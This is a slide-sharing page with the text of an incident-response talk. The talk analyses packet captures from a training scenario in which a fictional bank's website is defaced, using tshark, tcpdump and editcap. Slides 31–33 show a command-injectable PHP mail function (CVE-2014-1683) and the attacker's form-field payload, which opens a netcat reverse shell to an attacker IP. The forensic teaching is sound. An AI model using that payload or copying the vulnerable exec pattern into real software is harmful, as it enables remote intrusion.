the incident responders toolkit the stuff they don t
play

The Incident Responders Toolkit the stuff they dont teach you in - PowerPoint PPT Presentation

Aug 08, 2023 •311 likes •709 views

The Incident Responders Toolkit the stuff they dont teach you in school Judith van Stegeren After my graduation After my graduation Where I work Skill set What I do What I do Case study: incident response Incident Response for fictional

  1. The Incident Responders Toolkit the stuff they don’t teach you in school Judith van Stegeren

  2. After my graduation

  3. After my graduation

  4. Where I work

  5. Skill set

  6. What I do

  7. What I do

  8. Case study: incident response

  9. Incident Response for fictional bank

  10. Zone-H: defacement registry

  11. Defacement

  12. Snort $ ls 2015-07-19 2015-07-20 2015-07-21 2015-07-22 2015-07-23 $ cd 2015-07-23 $ ls snort.log.1437609637 snort.log.1437656593 snort.log.1437692410

  13. Finding the right log $ ls snort.log.1437609637 snort.log.1437656593 snort.log.1437692410 $ capinfos -a * File name: snort.log.1437609637 First packet time: 2015-07-23 02:11:16.403393 File name: snort.log.1437656593 First packet time: 2015-07-23 15:03:13.956770 File name: snort.log.1437692410 First packet time: 2015-07-24 01:00:10.028476

  14. Wireshark!

  15. Wireshark!

  16. Wireshark!

  17. User Agent “In computing, a user agent is software (a software agent) that is acting on behalf of a user.” (Wikipedia) Examples: "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "Hetzner System Monitoring" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:40.0) Gecko/20100101 Firefox/40.0" "Tiny Tiny RSS/16.8 (3d5d289) (http://tt-rss.org/)" "Tiny Tiny RSS/17.1 (78fee22) (http://tt-rss.org/)" "Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)"

  18. Obtaining a list of User Agents with tshark $ tshark -Y "ip.src == 82.145.37.203 and http.request" -r snort.log.1437656593 -T fields -e http.user_agent | sort | uniq -c | sort -nr | head

  19. Obtaining a list of User Agents with tshark $ tshark -Y "ip.src == 82.145.37.203 and http.request" -r snort.log.1437656593 -T fields -e http.user_agent | sort | uniq -c | sort -nr | head 452 w3af.org 415 Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:map_codes) 290 Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:sitezip) 79 Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.5.0 42 Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:cgi dir check) 32 Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:multiple_index) 32 Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:embedded detection) 12 Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:headers: Translate-f #1) 12 Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:001398) 12 Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:001397)

  20. Obtaining a list of requests with tshark $ tshark -Y "ip.src == 82.145.37.203 and http.request and http.user_agent contains Firefox" -r snort.log.1437656593 -T fields -e http.request.method -e http.host -e http.request.uri | sort | uniq -c | sort -nr

  21. Obtaining a list of requests with tshark $ tshark -Y "ip.src == 82.145.37.203 and http.request and http.user_agent contains Firefox" -r snort.log.1437656593 -T fields -e http.request.method -e http.host -e http.request.uri | sort | uniq -c | sort -nr 9 GET www.mcduckbank.net / 8 GET www.mcduckbank.net /data/media/portfolio/mcduck_on_money.jpg 5 GET www.mcduckbank.net /admin.php?mgr=login&js=1 4 POST www.mcduckbank.net /index.php?pid=4 4 GET www.mcduckbank.net /ui/elements/css/elements.css 4 GET www.mcduckbank.net /ui/admin/js/scripts.js 4 GET www.mcduckbank.net /ui/admin/js/jquery.js 4 GET www.mcduckbank.net /ui/admin/js/imagehover.js 4 GET www.mcduckbank.net /ui/admin/images/bg.clouds.mgr.png 4 GET www.mcduckbank.net /ui/admin/css/tabs.css 4 GET www.mcduckbank.net /ui/admin/css/ssm.type.css 4 GET www.mcduckbank.net /ui/admin/css/ssm.tables.css 4 GET www.mcduckbank.net /ui/admin/css/ssm.master.css 4 GET www.mcduckbank.net /index.php?pid=4 3 POST www.mcduckbank.net /admin.php?mgr=login&js=1&try=1 2 GET www.mcduckbank.net /ui/elements/images/icon.error.gif 2 GET www.mcduckbank.net /favicon.ico 2 GET www.mcduckbank.net /admin.php?en_log_id=0&action=users 2 GET www.mcduckbank.net /admin.php 1 GET www.mcduckbank.net /ui/admin/images/bg.login.png 1 GET www.mcduckbank.net /bb.jpg

  22. Intermezzo: dealing with unwieldy PCAP files

  23. Intermezzo: dealing with unwieldy PCAP files $ ls -lsh -rw-r--r-- 1 judith judith 154M Jul 23 2015 snort.log.1437609637 -rw-r--r-- 1 judith judith 155M Jul 24 2015 snort.log.1437656593 -rw-r--r-- 1 judith judith 264K Jul 24 2015 snort.log.1437692410

  24. Intermezzo: dealing with unwieldy PCAP files Let’s filter on attacker IP $ tcpdump -r snort.log.1437656593 -w attacker.pcap host 82.145.37.203

  25. Intermezzo: dealing with unwieldy PCAP files Let’s filter on attacker IP $ tcpdump -r snort.log.1437656593 -w attacker.pcap host 82.145.37.203 And then filter out only packages from after 17:00 $ editcap -A "2015-07-23 17:00:00" -F pcap attacker.pcap attacker_after_17.pcap

  26. Intermezzo: dealing with unwieldy PCAP files $ ls -lsh total 320M 440K -rw-r--r-- 1 judith judith 439K Apr 11 16:21 attacker_after_17.pcap 10M -rw-r--r-- 1 judith judith 10M Apr 11 16:14 attacker.pcap 154M -rw-r--r-- 1 judith judith 154M Jul 23 2015 snort.log.1437609637 155M -rw-r--r-- 1 judith judith 155M Jul 24 2015 snort.log.1437656593 264K -rw-r--r-- 1 judith judith 264K Jul 24 2015 snort.log.1437692410

  27. Small PCAP

  28. Attack 1

  29. Attack 2

  30. Contactform

  31. Underlying PHP code function bashMail($sbj, $msg, $to, $cc=’’, $bc=’’) { $cmd = ’echo "’.$msg.’" | mail -s "’.$sbj.’" ’.$to; exec($cmd, $err); $res = count($err) == 0 ? 1 : 4 ; return $res; }

  32. Underlying PHP code function bashMail($sbj, $msg, $to, $cc=’’, $bc=’’) { $cmd = ’echo "’.$msg.’" | mail -s "’.$sbj.’" ’.$to; exec($cmd, $err); $res = count($err) == 0 ? 1 : 4 ; return $res; } CVE-2014-1683 “It is possible to exploit this vulnerability because the POST parameters name , email , subject , and message are not properly sanitized when submitted to the contactform page. Arbitrary commands can be executed by injecting the payload to a vulnerable parameter.” source: http://seclists.org/fulldisclosure/2014/Jan/159

  33. Command injection results Input sent by attacker: escape"; /bin/nc.traditional -e /bin/sh [attacker ip] 37226; echo " Resulting PHP code: exec(’echo "escape"; /bin/nc.traditional -e /bin/sh [attacker ip] 37226; echo "" | mail -s "’.$sbj.’" ’.$to, $err);

  34. Attacker shell

  35. Attacker shell

  36. Summary 1. Automated website scans w3af/Nikto 2. Manual attacks via Firefox/IceWeasel 3. Brute-force attacks on administrator panel 4. Command injection attack via contact form 5. Upload new index and image via netcat Credits PCAP and defacement scenario by Erik Hjelmvik, NETRESEC (SE)

  37. What can we learn from this scenario?

  38. Further reading Career advice ◮ www.cyberdomein.nl , “Carriere” ◮ www.jvns.ca , “How to be a wizard programmer” and all other comics by Julia Evans Practice your infosec skills ◮ http://forensicscontest.com/puzzles , network forensics puzzles and answers ◮ www.certifiedsecure.com , online challenges, mostly web security ◮ www.microcorruption.com , assembly-focused (virtual) hardware hacking ◮ www.cryptopals.com , learn to implement and break crypto ◮ www.crimediggers.nl , digital forensics challenge by the Dutch police

  39. Questions?

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

Poison Ivy for Incident Responders Andreas Schuster Poison Ivy in the Press What is Poison

Poison Ivy for Incident Responders Andreas Schuster Poison Ivy in the Press What is Poison

Poison Ivy for Incident Responders Andreas Schuster Poison Ivy in the Press What is Poison Ivy? Poison Ivy is a Powerful RAT Target platform: Microsoft Windows, 32bit System information and manipulation Keyword search Password

778 views • 55 slides
Federal Highway Administration Traffic Incident Management Program Update The Evolving Business

Federal Highway Administration Traffic Incident Management Program Update The Evolving Business

Federal Highway Administration Traffic Incident Management Program Update The Evolving Business Case: Why TIM? The business case for training incident responders: 1. The safety of incident responders. 2. The safety of all road users. 3.

770 views • 18 slides
Lessons from the 10/5/2015 Emergency Incident The bomb threat incident of October 5 was truly a

Lessons from the 10/5/2015 Emergency Incident The bomb threat incident of October 5 was truly a

Prepared by Curtis Sommerfeld, 10/9/2015 Lessons from the 10/5/2015 Emergency Incident The bomb threat incident of October 5 was truly a cruel hoax, placing both the college community and emergency responders in harms way , causing much

373 views • 4 slides
Taking Care of the Caregivers Purpose Educate ADHS responders to a disaster about:

Taking Care of the Caregivers Purpose Educate ADHS responders to a disaster about:

Taking Care of the Caregivers Purpose Educate ADHS responders to a disaster about: critical incident stress. compassion fatigue. the types of crisis intervention services that will be utilized. the importance of self-care.

653 views • 23 slides
Ultrafast spectroscopy Detector Stuff Generally you have some stuff and you want to

Ultrafast spectroscopy Detector Stuff Generally you have some stuff and you want to

Ultrafast spectroscopy Detector Stuff Generally you have some stuff and you want to know something about the dynamics of the stuff Kick the stuff with an excitation or pump pulse which triggers some dynamical process

817 views • 33 slides
Title I, Part A Directors Toolkit Title I, Part A Directors Toolkit Toolkit Format:

Title I, Part A Directors Toolkit Title I, Part A Directors Toolkit Toolkit Format:

Title I, Part A Directors Toolkit Title I, Part A Directors Toolkit Toolkit Format: Title I-A Directors Handbook Webinars Concise, informational, 5-10 minutes Covering critical topics in ESSA Viewers select the topic,

636 views • 25 slides
Incident Action Planning in the EOC GGC NHC 2018 GGC NHC 2018 Incident Action Planning EOC

Incident Action Planning in the EOC GGC NHC 2018 GGC NHC 2018 Incident Action Planning EOC

Incident Action Planning in the EOC GGC NHC 2018 GGC NHC 2018 Incident Action Planning EOC plans are typically more strategic than field IAPs A planning process helps synchronize operations and ensure they support incident objectives

510 views • 34 slides
Grating Incident resulting in LTI Agenda Background and Medical Condition Incident

Grating Incident resulting in LTI Agenda Background and Medical Condition Incident

Grating Incident resulting in LTI Agenda Background and Medical Condition Incident Description Immediate Causes and Latent Failures Swiss Cheese Model Key HSSE Themes from the Grating Incident Weak Signals from

564 views • 14 slides
TMHRA FIRST RESPONDER SUPPORT August 2020 FF CALL FIRST RESPONDERS LIVE 2 DO YOU BELIEVE

TMHRA FIRST RESPONDER SUPPORT August 2020 FF CALL FIRST RESPONDERS LIVE 2 DO YOU BELIEVE

TMHRA FIRST RESPONDER SUPPORT August 2020 FF CALL FIRST RESPONDERS LIVE 2 DO YOU BELIEVE YOUR CURRENT MENTAL HEALTH SOLUTION PROVIDES ADEQUATE SUPPORT TO YOUR FIRST RESPONDERS? 3 We have more hotlines and programs than ever before; yet

281 views • 25 slides
Incident Response & Evidence Incident Response & Evidence Incident Response &

Incident Response & Evidence Incident Response & Evidence Incident Response &

Incident Response & Evidence Incident Response & Evidence Incident Response & Evidence Incident Response & Evidence Management Management Management Management CIPS Brandon Chapter November 28 2002 Dr. Marc Rogers PhD,

629 views • 27 slides
Sta ff Diversity Hiring Toolkit Sta ff Diversity Hiring Toolkit Toolkit accessible

Sta ff Diversity Hiring Toolkit Sta ff Diversity Hiring Toolkit Toolkit accessible

Sta ff Diversity Hiring Toolkit Sta ff Diversity Hiring Toolkit Toolkit accessible online: www.washington.edu/diversity/staffdiv/hiringtoolkit/ A resource for HR Directors and

322 views • 8 slides
Incident Mobilization Incident Mobilization (R- -T T- -S) Nets S) Nets (R Mobilization

Incident Mobilization Incident Mobilization (R- -T T- -S) Nets S) Nets (R Mobilization

V olunteer C ommunications N etwork (V-C-N) Incident Mobilization Incident Mobilization (R- -T T- -S) Nets S) Nets (R Mobilization Radio Nets for ZR Incidents - A V-C-N.org Academy Course - 2012-04.08-0237 264: Incident Mobilization

773 views • 50 slides
Incident Mobilization Incident Mobilization (R- -T T- -S) Nets S) Nets (R Mobilization

Incident Mobilization Incident Mobilization (R- -T T- -S) Nets S) Nets (R Mobilization

V olunteer C ommunications N etwork (V-C-N) Incident Mobilization Incident Mobilization (R- -T T- -S) Nets S) Nets (R Mobilization Radio Nets for ZR Incidents - A V-C-N.org Academy Course - 2012-04.08-0237 264: Incident Mobilization

753 views • 20 slides
Deployment Supports for Disaster Behavioral Health Responders Julie Liu, M.A. Lori McGee, M.A.

Deployment Supports for Disaster Behavioral Health Responders Julie Liu, M.A. Lori McGee, M.A.

Deployment Supports for Disaster Behavioral Health Responders Julie Liu, M.A. Lori McGee, M.A. August 2012 April Naturale, Ph.D. Goals To increase awareness of the unique issues disaster behavioral health responders face. To provide

395 views • 25 slides
CRITICAL INFORMATICS Our stuff keeps your stuff from becoming their stuff CRITICAL INFORMATICS

CRITICAL INFORMATICS Our stuff keeps your stuff from becoming their stuff CRITICAL INFORMATICS

CRITICAL INFORMATICS www.criticalinformatics.com January 31, 2018 CRITICAL INFORMATICS Our stuff keeps your stuff from becoming their stuff CRITICAL INFORMATICS www.criticalinformatics.com Page 2 UW UW T Tec ech h Co Conn nnec ect

585 views • 21 slides
B ACKGROUND : H OW ARE FIRST RESPONDERS ARE UNIQUE ? Unique work characteristics 1 High

B ACKGROUND : H OW ARE FIRST RESPONDERS ARE UNIQUE ? Unique work characteristics 1 High

D IFFERENCES IN D ISABILITY M ANAGEMENT O UTCOMES IN F IRST R ESPONDERS C OMPARED TO H IGH AND L OW P HYSICAL D EMAND W ORKERS Thursday May 16 th , 2018 Shannon Killip, MSc killips@mcmaster.ca B ACKGROUND : H OW ARE FIRST RESPONDERS ARE UNIQUE ?

508 views • 19 slides
Surface Damage in Silicon Devices E. Fretwurst University of Hamburg Institute for Experimental

Surface Damage in Silicon Devices E. Fretwurst University of Hamburg Institute for Experimental

Surface Damage in Silicon Devices E. Fretwurst University of Hamburg Institute for Experimental Physics 4. Detector Workshop of the Helmholtz Alliance Physics at the Terascale E. Fretwurst, Uni-Hamburg 4th Detector Workshop of the

781 views • 38 slides
LLCD will be the first high-rate space laser communications system that can be operated over a

LLCD will be the first high-rate space laser communications system that can be operated over a

LLCD will be the first high-rate space laser communications system that can be operated over a range ten times larger than the near-Earth ranges that have been demonstrated to date. from http://esc.gsfc.nasa.gov/267/271.html, enabled by

564 views • 37 slides
Random Projections & Applications To Dimensionality Reduction Aditya Krishna Menon (BSc.

Random Projections & Applications To Dimensionality Reduction Aditya Krishna Menon (BSc.

Random Projections & Applications To Dimensionality Reduction Aditya Krishna Menon (BSc. Advanced) Supervisors: Dr. Sanjay Chawla Dr. Anastasios Viglas High-dimensionality Lots of data objects/items with some attributes i.e.

429 views • 17 slides
NBTI in GaN MOSFETs: SiO 2 vs. SiO 2 /Al 2 O 3 gate dielectric Alex Guo and Jess A. del Alamo

NBTI in GaN MOSFETs: SiO 2 vs. SiO 2 /Al 2 O 3 gate dielectric Alex Guo and Jess A. del Alamo

NBTI in GaN MOSFETs: SiO 2 vs. SiO 2 /Al 2 O 3 gate dielectric Alex Guo and Jess A. del Alamo Microsystems Technology Laboratories (MTL) Massachusetts Institute of Technology (MIT) Cambridge, MA, USA Sponsor: MIT/MTL Gallium Nitride (GaN)

372 views • 24 slides
The Legacy of Godfrey Stafford a Celebration Andrew Harrison Diamond Light Source RAL -

The Legacy of Godfrey Stafford a Celebration Andrew Harrison Diamond Light Source RAL -

The Legacy of Godfrey Stafford a Celebration Andrew Harrison Diamond Light Source RAL - January 24 th 2014 The Legacy of Godfrey Stafford a Celebration Andrew Harrison Diamond Light Source RAL - January 24 th 2014 Running motorbike

340 views • 33 slides
Transistors Lecture 5 CS 350 S18 - Hale 1 CMOS transistors CS 350 S18 - Hale 2 CS 350 S18 -

Transistors Lecture 5 CS 350 S18 - Hale 1 CMOS transistors CS 350 S18 - Hale 2 CS 350 S18 -

Transistors Lecture 5 CS 350 S18 - Hale 1 CMOS transistors CS 350 S18 - Hale 2 CS 350 S18 - Hale 3 Crystalline silicon lattice CS 350 S18 - Hale 4 Group III (wants CS 350 S18 - Hale 5 CS 350 S18 - Hale 6 Group V (wants CS 350 S18 -

357 views • 19 slides
State of XT Software: The Year in Review The Year in Review David Wallace Director, Technical

State of XT Software: The Year in Review The Year in Review David Wallace Director, Technical

State of XT Software: The Year in Review The Year in Review David Wallace Director, Technical Project Lead dbw@cray.com XT Year in Review Accomplishments over the last 12 months Brief Glimpse of Future May 8, 2008 Cray Inc. Proprietary

682 views • 19 slides
CENG 4480 L09 Memory 2 Bei Yu Reference : Chapter 11 Memories CMOS VLSI DesignA

CENG 4480 L09 Memory 2 Bei Yu Reference : Chapter 11 Memories CMOS VLSI DesignA

CENG 4480 L09 Memory 2 Bei Yu Reference : Chapter 11 Memories CMOS VLSI DesignA Circuits and Systems Perspective by H.E.Weste and D.M.Harris 1 CENG4480 v.s. CENG3420 CENG3420: architecture perspective memory coherent

588 views • 44 slides

More recommend